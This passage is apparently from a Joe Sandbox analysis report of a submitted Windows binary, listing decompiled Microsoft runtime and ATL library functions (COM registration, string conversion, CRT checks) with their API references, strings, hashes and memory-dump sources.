                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressErrorLastProc$LibraryModule__aligned_msize$FileFreeFromHandleInstallLoadNamePathReport
                      • String ID: MSPDB140$VCRUNTIME140D.dll
                      • API String ID: 1159430209-1916464790
                      • Opcode ID: 198fac516ef287f2b6e3137c8c36172f24614147e6e0757dbdb641aeaa01dd70
                      • Instruction ID: 915ac5f2e248265752d6623bd66518697576e44f6e455690408a094ea688aa15
                      • Opcode Fuzzy Hash: 198fac516ef287f2b6e3137c8c36172f24614147e6e0757dbdb641aeaa01dd70
                      • Instruction Fuzzy Hash: DF3189B6EC020876EB20E7A0AD46F9973AD5B50705F148163FD05E62D3FB71DA44C6A1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009434A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 90COMMON
                      Download Yara Rule
                      C-Code - Quality: 44%
                      			E009434A0(void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t30;
				void* _t33;
				intOrPtr _t35;
				void* _t37;
				void* _t40;
				void* _t46;
				intOrPtr* _t55;
				void* _t64;
				void* _t65;

				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				do {
					_t30 = _a4;
					_t67 =  *((intOrPtr*)(_t30 + 0x10));
					if( *((intOrPtr*)(_t30 + 0x10)) == 0) {
						_t46 = L00994930(_t67, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xfa, 0, "%ls", L"pCache != 0");
						_t65 = _t65 + 0x18;
						if(_t46 == 1) {
							asm("int3");
						}
					}
					_t55 = 0;
				} while (0 != 0);
				_v12 = 0;
				if( *((intOrPtr*)(_a4 + 8)) != 0) {
					_t55 =  *((intOrPtr*)(_a4 + 8));
					_t33 =  *_t55( *((intOrPtr*)(_a4 + 0xc)), 0xa002d4,  &_v12);
					__eflags = _t65 - _t65;
					_v20 = E009D1520(_t33, _t65 - _t65);
					__eflags = _v20;
					if(_v20 >= 0) {
						_t55 = _a4;
						__imp__CoRegisterClassObject( *_t55, _v12, _a8, _a12,  *((intOrPtr*)(_a4 + 0x10)) + 4);
						__eflags = _t65 - _t65;
						_v20 = E009D1520( *_t55, _t65 - _t65);
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t55 =  *_v12;
						_t40 =  *((intOrPtr*)( *((intOrPtr*)(_t55 + 8))))(_v12);
						__eflags = _t65 - _t65;
						E009D1520(_t40, _t65 - _t65);
					}
					_t35 = _v20;
				} else {
					_t35 = 0;
				}
				_push(_t55);
				E009D14C0(_t64, 0x94359c);
				_t37 = _t35;
				return E009D1520(_t37, _t64 - _t65 + 0x10);
			}
















                      0x009434ac
                      0x009434af
                      0x009434b2
                      0x009434b5
                      0x009434b8
                      0x009434b8
                      0x009434bb
                      0x009434bf
                      0x009434d9
                      0x009434de
                      0x009434e4
                      0x009434e6
                      0x009434e6
                      0x009434e4
                      0x009434e7
                      0x009434e7
                      0x009434eb
                      0x009434f9
                      0x00943514
                      0x00943517
                      0x00943519
                      0x00943520
                      0x00943523
                      0x00943527
                      0x00943541
                      0x00943547
                      0x0094354d
                      0x00943554
                      0x00943554
                      0x00943557
                      0x0094355b
                      0x00943560
                      0x0094356b
                      0x0094356d
                      0x0094356f
                      0x0094356f
                      0x00943574
                      0x009434fb
                      0x009434fb
                      0x009434fb
                      0x00943577
                      0x00943581
                      0x00943586
                      0x00943596

                      APIs
                      • CoRegisterClassObject.OLE32(?,00000000,?,00000000,?), ref: 00943547
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00943581
                      Strings
                      • %ls, xrefs: 009434C6
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 009434D2
                      • pCache != 0, xrefs: 009434C1
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckClassObjectRegisterStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$pCache != 0
                      • API String ID: 1978586063-3984120347
                      • Opcode ID: a386b112b1735cdbf19a80d475e46d88e8b724ddc8502c03b06d43edc07eca43
                      • Instruction ID: 7e8cc4ff98d0ad17b800071a729fc1b261a0cfcc08656471936f2d881dcde7f7
                      • Opcode Fuzzy Hash: a386b112b1735cdbf19a80d475e46d88e8b724ddc8502c03b06d43edc07eca43
                      • Instruction Fuzzy Hash: EF316172A00218AFCB14EFA8D845FAEB7B5AB88354F10C659F5099B351D774DE80CBD0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00990A50 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 89timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E00990A50(intOrPtr _a4) {
				signed int _v8;
				char _v12;
				signed char _v16;
				signed char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed char _t34;
				void* _t40;
				signed int _t42;
				signed int _t60;
				void* _t61;

				E00976E20( &_v12, _a4);
				_t34 = E00979640( &_v12);
				_t50 = _t34 & 0x000000ff;
				if((_t34 & 0x000000ff) != 0) {
					L12:
					_v24 = 1;
					L13:
					_v28 = _v24;
					_t70 = _v28;
					if(_v28 == 0) {
						_t40 = L00994930(_t70, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio.h", 0x1b8, 0, L"%ls", L"( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && !_tm_unicode_safe(fn))))");
						_t61 = _t61 + 0x18;
						if(_t40 == 1) {
							asm("int3");
						}
					}
					if(_v28 != 0) {
						return 1;
					} else {
						 *((intOrPtr*)(L00992F70(_t50))) = 0x16;
						E00992900(L"( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && !_tm_unicode_safe(fn))))", L"__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio.h", 0x1b8, 0);
						return 0;
					}
				}
				_t50 =  &_v12;
				_t42 = E009A8780(E0097C080( &_v12));
				_t61 = _t61 + 4;
				_v8 = _t42;
				if(_v8 == 0xffffffff || _v8 == 0xfffffffe) {
					_v16 = 0xa061f0;
				} else {
					_t60 = _v8 >> 6;
					_t50 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb31198 + _t60 * 4));
					_v16 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb31198 + _t60 * 4));
				}
				if( *((char*)(_v16 + 0x29)) != 0) {
					L11:
					_v24 = 0;
					goto L13;
				} else {
					if(_v8 == 0xffffffff || _v8 == 0xfffffffe) {
						_v20 = 0xa061f0;
					} else {
						_v20 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb31198 + (_v8 >> 6) * 4));
					}
					_t25 = _v20 + 0x2d; // 0x0
					_t50 =  *_t25 & 0x00000001;
					if(( *_t25 & 1) == 0) {
						goto L12;
					} else {
						goto L11;
					}
				}
			}














                      0x00990a5f
                      0x00990a67
                      0x00990a6c
                      0x00990a71
                      0x00990b09
                      0x00990b09
                      0x00990b10
                      0x00990b13
                      0x00990b16
                      0x00990b1a
                      0x00990b34
                      0x00990b39
                      0x00990b3f
                      0x00990b41
                      0x00990b41
                      0x00990b3f
                      0x00990b46
                      0x00000000
                      0x00990b48
                      0x00990b4d
                      0x00990b69
                      0x00000000
                      0x00990b71
                      0x00990b46
                      0x00990a77
                      0x00990a80
                      0x00990a85
                      0x00990a88
                      0x00990a8f
                      0x00990ab2
                      0x00990a97
                      0x00990a9a
                      0x00990aa6
                      0x00990aad
                      0x00990aad
                      0x00990ac0
                      0x00990b00
                      0x00990b00
                      0x00000000
                      0x00990ac2
                      0x00990ac6
                      0x00990ae9
                      0x00990ace
                      0x00990ae4
                      0x00990ae4
                      0x00990af3
                      0x00990af6
                      0x00990afe
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00990afe

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00990A5F
                        • Part of subcall function 009A8780: std::_Timevec::_Timevec.LIBCPMTD ref: 009A878F
                      Strings
                      • %ls, xrefs: 00990B21
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio.h, xrefs: 00990B2D, 00990B5A
                      • __acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required, xrefs: 00990B5F
                      • ( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && , xrefs: 00990B1C, 00990B64
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && $__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required$minkernel\crts\ucrt\inc\corecrt_internal_stdio.h
                      • API String ID: 4219598475-3476576762
                      • Opcode ID: 1d45c782f11a7321c0ff63453ea20c16f7adf0d9d6ae95393b5de0616312bd53
                      • Instruction ID: 1fa0929a8d5b81dd94502b61b3dad28fa67355e7a076cfb6addf76bc1c89e1fd
                      • Opcode Fuzzy Hash: 1d45c782f11a7321c0ff63453ea20c16f7adf0d9d6ae95393b5de0616312bd53
                      • Instruction Fuzzy Hash: 4731B2B0D41309EFCF14DF98DC06BAEB7B8AB90319F248259E0216B2D2D7745A51DB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009A3520 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 81COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 91%
                      			E009A3520(signed int _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t38;
				void* _t41;

				_t44 = 0xb31098 + _a4 * 4;
				_v12 = E0096AE90(0xb31098 + _a4 * 4);
				if(_v12 == 0) {
					_v8 = E009A3670(_t44,  *((intOrPtr*)(0x9e8730 + _a4 * 4)));
					__eflags = _v8;
					if(_v8 != 0) {
						_v20 = E0096AE60(0xb31098 + _a4 * 4, _v8);
						__eflags = _v20;
						if(_v20 != 0) {
							__eflags = _v20 - _v8;
							if(__eflags != 0) {
								_t38 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\internal\\winapi_thunks.cpp", 0xff, 0, L"%ls", L"cached_handle == new_handle");
								__eflags = _t38 - 1;
								if(_t38 == 1) {
									asm("int3");
								}
							}
							FreeLibrary(_v8);
						}
						return _v8;
					}
					_v16 = E0096AE70(0xb31098 + _a4 * 4, 0xffffffff);
					__eflags = _v16;
					if(_v16 != 0) {
						__eflags = _v16 - 0xffffffff;
						if(__eflags != 0) {
							_t41 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\internal\\winapi_thunks.cpp", 0xf3, 0, L"%ls", L"cached_handle == INVALID_HANDLE_VALUE");
							__eflags = _t41 - 1;
							if(_t41 == 1) {
								asm("int3");
							}
						}
					}
					return 0;
				}
				if(_v12 == 0xffffffff) {
					return 0;
				}
				return _v12;
			}









                      0x009a352b
                      0x009a353b
                      0x009a3542
                      0x009a356c
                      0x009a356f
                      0x009a3573
                      0x009a35da
                      0x009a35dd
                      0x009a35e1
                      0x009a35e6
                      0x009a35e9
                      0x009a3603
                      0x009a360b
                      0x009a360e
                      0x009a3610
                      0x009a3610
                      0x009a360e
                      0x009a3615
                      0x009a3615
                      0x00000000
                      0x009a361b
                      0x009a358a
                      0x009a358d
                      0x009a3591
                      0x009a3593
                      0x009a3597
                      0x009a35b1
                      0x009a35b9
                      0x009a35bc
                      0x009a35be
                      0x009a35be
                      0x009a35bc
                      0x009a3597
                      0x00000000
                      0x009a35bf
                      0x009a3548
                      0x00000000
                      0x009a354a
                      0x00000000

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$cached_handle == INVALID_HANDLE_VALUE$cached_handle == new_handle$minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp
                      • API String ID: 0-442401637
                      • Opcode ID: 7cd2608acb89bd99e02a79d0c9650171d6d1a0f0e0288687003769746cbe6cdf
                      • Instruction ID: 734f0f5a01484647085edaed62daf63bcfac17d3cad23a35dc84b93bde7aa7eb
                      • Opcode Fuzzy Hash: 7cd2608acb89bd99e02a79d0c9650171d6d1a0f0e0288687003769746cbe6cdf
                      • Instruction Fuzzy Hash: 9E21A270D40209FBCF10EFA8DC4AF6E7778AB42318F248955F419A72C1EA71AB44CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00941BB0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 81COMMON
                      Download Yara Rule
                      C-Code - Quality: 72%
                      			E00941BB0(void* __ecx, void* __esi, char* _a4, short* _a8, int _a12, int _a16) {
				intOrPtr _v8;
				char* _t14;
				int _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t31;
				void* _t32;

				_v8 = 0xcccccccc;
				_t34 = _a8;
				if(_a8 == 0) {
					_t22 = L00994930(_t34, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x24d, 0, "%ls", L"lpw != 0");
					_t32 = _t32 + 0x18;
					if(_t22 == 1) {
						asm("int3");
					}
				}
				_t36 = _a4;
				if(_a4 == 0) {
					_t21 = L00994930(_t36, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x24e, 0, "%ls", L"lpa != 0");
					_t32 = _t32 + 0x18;
					if(_t21 == 1) {
						asm("int3");
					}
				}
				if(_a4 == 0 || _a8 == 0) {
					_t14 = 0;
				} else {
					 *_a4 = 0;
					_t18 = WideCharToMultiByte(_a16, 0, _a8, 0xffffffff, _a4, _a12, 0, 0);
					__eflags = _t32 - _t32;
					_v8 = E009D1520(_t18, _t32 - _t32);
					__eflags = _v8;
					if(__eflags != 0) {
						_t14 = _a4;
					} else {
						__eflags = 0;
						if(0 == 0) {
							_t20 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x258, 0, "%ls", 0x9f40dc);
							_t32 = _t32 + 0x18;
							__eflags = _t20 - 1;
							if(__eflags == 0) {
								asm("int3");
							}
						}
						_t14 = 0;
					}
				}
				return E009D1520(_t14, _t31 - _t32 + 4);
			}











                      0x00941bb5
                      0x00941bbc
                      0x00941bc0
                      0x00941bda
                      0x00941bdf
                      0x00941be5
                      0x00941be7
                      0x00941be7
                      0x00941be5
                      0x00941be8
                      0x00941bec
                      0x00941c06
                      0x00941c0b
                      0x00941c11
                      0x00941c13
                      0x00941c13
                      0x00941c11
                      0x00941c18
                      0x00941c20
                      0x00941c24
                      0x00941c27
                      0x00941c44
                      0x00941c4a
                      0x00941c51
                      0x00941c54
                      0x00941c58
                      0x00941c88
                      0x00941c5a
                      0x00941c5a
                      0x00941c5c
                      0x00941c76
                      0x00941c7b
                      0x00941c7e
                      0x00941c81
                      0x00941c83
                      0x00941c83
                      0x00941c81
                      0x00941c84
                      0x00941c84
                      0x00941c58
                      0x00941c99

                      APIs
                      • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00941C44
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$lpa != 0$lpw != 0
                      • API String ID: 626452242-3592995100
                      • Opcode ID: f4c9ec26785b7cb2ba321b33d2fca643bf08a86e52564cd30c06ed2c902da742
                      • Instruction ID: 89042fcf50cb95c50284fe9fc8789d80045ae0dafd73458d65aad25909c20676
                      • Opcode Fuzzy Hash: f4c9ec26785b7cb2ba321b33d2fca643bf08a86e52564cd30c06ed2c902da742
                      • Instruction Fuzzy Hash: 2B21D431BC031CBBDB209B58DC87FAB32689BA0B56F108505FB156A1C1D6B199D08BD5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00943E80 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 81comCOMMON
                      Download Yara Rule
                      C-Code - Quality: 60%
                      			E00943E80(intOrPtr __ecx, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t23;
				intOrPtr _t24;
				void* _t30;
				void* _t32;
				intOrPtr _t35;
				void* _t48;
				void* _t49;

				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t51 = _a4;
				if(_a4 == 0) {
					_t23 = L00994930(_t51, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xc25, 0, "%ls", L"ppGIT != 0");
					_t49 = _t49 + 0x18;
					if(_t23 == 1) {
						asm("int3");
					}
				}
				if(_a4 != 0) {
					_v12 = 0;
					_t35 = _v8;
					__eflags =  *((intOrPtr*)(_t35 + 0x28));
					if( *((intOrPtr*)(_t35 + 0x28)) == 0) {
						__imp__CoCreateInstance(0x9d65d0, 0, 1, 0xa00548, _v8 + 0x28);
						__eflags = _t49 - _t49;
						_v12 = E009D1520(_t23, _t49 - _t49);
					}
					__eflags = _v12;
					if(__eflags < 0) {
						L13:
						_t24 = _v12;
						L14:
						return E009D1520(_t24, _t48 - _t49 + 8);
					} else {
						do {
							__eflags =  *((intOrPtr*)(_v8 + 0x28));
							if(__eflags == 0) {
								_t32 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xc33, 0, "%ls", L"m_pGIT != 0");
								_t49 = _t49 + 0x18;
								__eflags = _t32 - 1;
								if(_t32 == 1) {
									asm("int3");
								}
							}
							__eflags = 0;
						} while (0 != 0);
						 *_a4 =  *((intOrPtr*)(_v8 + 0x28));
						_t30 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)))) + 4))))( *((intOrPtr*)(_v8 + 0x28)));
						__eflags = _t49 - _t49;
						E009D1520(_t30, __eflags);
						goto L13;
					}
				}
				_t24 = 0x80004003;
				goto L14;
			}












                      0x00943e87
                      0x00943e8e
                      0x00943e95
                      0x00943e98
                      0x00943e9c
                      0x00943eb6
                      0x00943ebb
                      0x00943ec1
                      0x00943ec3
                      0x00943ec3
                      0x00943ec1
                      0x00943ec8
                      0x00943ed4
                      0x00943edb
                      0x00943ede
                      0x00943ee2
                      0x00943efb
                      0x00943f01
                      0x00943f08
                      0x00943f08
                      0x00943f0b
                      0x00943f0f
                      0x00943f6c
                      0x00943f6c
                      0x00943f70
                      0x00943f7d
                      0x00943f11
                      0x00943f11
                      0x00943f14
                      0x00943f18
                      0x00943f32
                      0x00943f37
                      0x00943f3a
                      0x00943f3d
                      0x00943f3f
                      0x00943f3f
                      0x00943f3d
                      0x00943f40
                      0x00943f40
                      0x00943f4d
                      0x00943f63
                      0x00943f65
                      0x00943f67
                      0x00000000
                      0x00943f67
                      0x00943f0f
                      0x00943eca
                      0x00000000

                      APIs
                      • CoCreateInstance.OLE32(009D65D0,00000000,00000001,00A00548,CCCCCCA4), ref: 00943EFB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CreateInstance
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$m_pGIT != 0$ppGIT != 0
                      • API String ID: 542301482-2412262283
                      • Opcode ID: cefe0e106b777af25cd9fc67dd7254f9dde6435d12f9fef2cae6a28e8b269e5c
                      • Instruction ID: 716dfe736678160280c97e0805ebbd154d1db3b54dacd52b787dcd45d4d34e7e
                      • Opcode Fuzzy Hash: cefe0e106b777af25cd9fc67dd7254f9dde6435d12f9fef2cae6a28e8b269e5c
                      • Instruction Fuzzy Hash: B2218071E80218BFDB10EB68D982F6DB775AB94718F20C184F9046B391D7B19E80CB85
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00962BE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00962BE0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v36;
				char* _v40;
				char _v44;
				char _v52;
				char _t27;
				char* _t36;
				char _t38;
				intOrPtr* _t40;
				char* _t47;
				intOrPtr _t57;
				char* _t58;
				intOrPtr _t59;
				void* _t62;
				void* _t63;

				_t57 = __edx;
				_t27 = E00960130(__ecx, 0);
				_t63 = _t62 + 4;
				_v28 = _t27;
				_v24 = _t57;
				E0095F1F0( &_v20,  &_v28);
				_t47 =  *0xb30640; // 0x0
				_t58 =  *_t47;
				if(_t58 == 0) {
					L0095FF10( &_v20, 1);
					L10:
					_v44 = E00960060(") ", 2);
					_v40 = _t58;
					E0095FCA0( &_v20,  &_v44);
					E0095F240(_a4,  &_v20);
					return _a4;
				}
				_t36 =  *0xb30640; // 0x0
				_v12 =  *_t36;
				_t59 =  *0xb30640; // 0x0
				_t58 = _t59 + 1;
				 *0xb30640 = _t58;
				_v8 = _v12;
				if(_v8 == 0x30) {
					_t38 = E00960060("void", 4);
					_t63 = _t63 + 8;
					_v36 = _t38;
					_v32 = _t58;
					E0095FCA0( &_v20,  &_v36);
					L8:
					goto L10;
				}
				if(_v8 == 0x32) {
					_t58 =  &_v52;
					_t40 = E00967B30(__ebx, __edi, __esi, __eflags, _t58);
					_t63 = _t63 + 4;
					E0095FD40( &_v20, _t40);
					goto L8;
				}
				if(_v8 == 0x35) {
					E0095F350(_a4, 2);
					return _a4;
				}
				goto L8;
			}























                      0x00962be0
                      0x00962be8
                      0x00962bed
                      0x00962bf0
                      0x00962bf3
                      0x00962bfd
                      0x00962c02
                      0x00962c08
                      0x00962c0d
                      0x00962c93
                      0x00962c98
                      0x00962ca7
                      0x00962caa
                      0x00962cb4
                      0x00962cc0
                      0x00000000
                      0x00962cc5
                      0x00962c0f
                      0x00962c17
                      0x00962c1a
                      0x00962c20
                      0x00962c23
                      0x00962c2c
                      0x00962c33
                      0x00962c4a
                      0x00962c4f
                      0x00962c52
                      0x00962c55
                      0x00962c5f
                      0x00962c8c
                      0x00000000
                      0x00962c8c
                      0x00962c39
                      0x00962c66
                      0x00962c6a
                      0x00962c6f
                      0x00962c76
                      0x00000000
                      0x00962c76
                      0x00962c3f
                      0x00962c82
                      0x00000000
                      0x00962c87
                      0x00000000

                      APIs
                        • Part of subcall function 00960130: UnDecorator::doUnderScore.LIBCMTD ref: 00960136
                      • DName::DName.LIBVCRUNTIMED ref: 00962C82
                      • DName::operator+=.LIBCMTD ref: 00962C93
                      • Mailbox.LIBCMTD ref: 00962CC0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
